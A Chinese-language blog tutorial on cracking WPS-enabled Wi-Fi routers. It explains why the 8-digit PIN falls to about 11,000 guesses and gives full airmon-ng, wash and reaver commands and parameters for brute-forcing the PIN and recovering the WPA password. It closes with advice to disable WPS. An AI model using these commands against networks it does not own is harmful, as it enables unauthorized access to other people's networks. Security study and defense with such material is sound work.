最近項目有點緊,所以本應該上周發的文章,拖到了本周三,在此說聲抱歉。無線安全專題,我打算系統地寫六個部分,分別為破解篇,攻擊篇,欺騙篇,路由篇,移動篇和藍牙篇,當然在發布的過程中,可能還會摻雜著發布flask的教程,分享我的個人博客框架。
上一篇咱們說到了破解篇的第一課:kali破解WPA,今天我們要說的是通過破解pin碼,來獲取開啟wps功能的wifi密碼。
路由器開啟wps功能后,會隨機生成一個8位的pin碼,通過暴力枚舉pin碼,達到破解的目的,尤其現在很多路由器默認開啟了wps功能。大家可能會想到8位的隨機pin碼將會有100000000
種情況,這要pin到何年何月呀。。。。。。不過接下來講解一下原理,大家會發現其實沒多少種情況,這也是這種攻擊方式比較流行的原因。
1.pin碼破解的原理:
pin碼是由8位純數字組成的識別碼,pin碼破解是分三部分進行的,規律是這樣的:pin碼分為三部分,如圖:
前4位為第一部分,第5-7位為第二部分,最后1位為第三部分。第一部分的驗證跟第二部分沒關聯,最后1位是根據第二部分計算得出的校驗碼。
破解一開始是先單獨對第一部分進行pin碼匹配,也就是說先破解前4位pin碼。前4位是0000-9999總共10000個組合。
當前4位pin碼確定后再對第二部分進行pin碼匹配,也就是再對5-7位進行破解,5-7位是000-999總共1000個組合。
當前7位都確定后,最后1位也會自動得出,破解完成。
根據pin碼破解的原理,可以看到只需要枚舉11000種情況就會必然破解出pin碼,從而通過pin得到wifi密碼。
2.PIN碼爆破:
講解明白原理,接下來開始使用工具爆破pin碼,無線專題我們都是基于kali2.0的操作系統,無線網卡采用的是WN722N。
爆破pin碼的前提是路由器開啟了WPS功能,首先咱們要做的是發現發現開啟WPS功能的wifi。
將網卡切換到監聽模式: airmon-ng start wlan1,
如果監聽模式切換失敗,請看第一篇的內容。
在命令行中輸入:wash -i wlan1,
掃描開啟wps的wifi設備。WPS Locked為No的都可以爆破試試。
找到了開啟WPS的wifi,接下來咱們就可以進行pin碼爆破,下面主要說一下reaver工具。
reaver 命令:
reaver -i mon0 -b mac -S -v
reaver命令參數:
-i 監聽后接口名稱
-b 目標mac地址
-a 自動檢測目標AP最佳配置
-S 使用最小的DH key(可以提高PJ速度)
-vv 顯示更多的非嚴重警告
-d? 即delay每窮舉一次的閑置時間 預設為1秒
-t? 即timeout每次窮舉等待反饋的最長時間
-c? 指定頻道可以方便找到信號,如-c1 指定1頻道
示例:
reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)
應因狀況調整參數(-c后面都已目標頻道為1作為例子)
目標信號非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
目標信號普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1
目標信號一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1
選擇之前掃描出來的開啟WPS的wifi,選擇一個進行破解。
輸入:reaver -i wlan1 -b 54:E6:FC:35:C5:82 -S -N -vv -c 4
在窮舉的過程中,reaver會生成以路由mac地址為名的wpc文件,這個文件在kali系統中/etc/reaver/文件夾下。
一時半會pin不出來,過段時間pin的時候命令加參數 -s file.wpc,就會根據之前的進度繼續pin。
3.注意點:
1.一般reaver 前四位默認是從0開始,如果想從指定的數值開始爆破需要添加-p參數:-p 9000,這個意思就是從9000開始,只要不pin死路由器,可以多開幾個窗口,從不同的數值開始。
2.最后pin完最后會顯示WPS PIN(正確的pin碼)和WPA PSK(wifi密碼),同時如果WPS功能沒關,pin碼沒修改,無論怎樣修改密碼,都可以通過pin碼獲取wifi密碼: reaver -i mon0 -b mac -p pin碼,來再次得到密碼
3.一般pin的過快,會把路由器pin死,所以一般還會加上-d5 -t5參數,添加5秒延時,當然數值可以自己改。
4.防范措施:
1.WPS功能對個人基本上沒啥作用,還是關了吧。
2.現在的路由一般會有防pin措施,例如會有300秒pin限制,但這個是偽防pin,作用不是很大。它設置時間間隔,正好防止我們把路由器pin死。所以還是把WPS功能關了,不要過分相信防pin措施,畢竟只有11000種情況,早晚會破解。
今天的分享就到這里,下一篇繼續分析。如果大家覺得還可以呀,記得推薦呦。
文/qiye(簡書作者)
原文鏈接:http://www.lxweimin.com/p/a8439e777af7
著作權歸作者所有,轉載請聯系作者獲得授權,并標注“簡書作者”。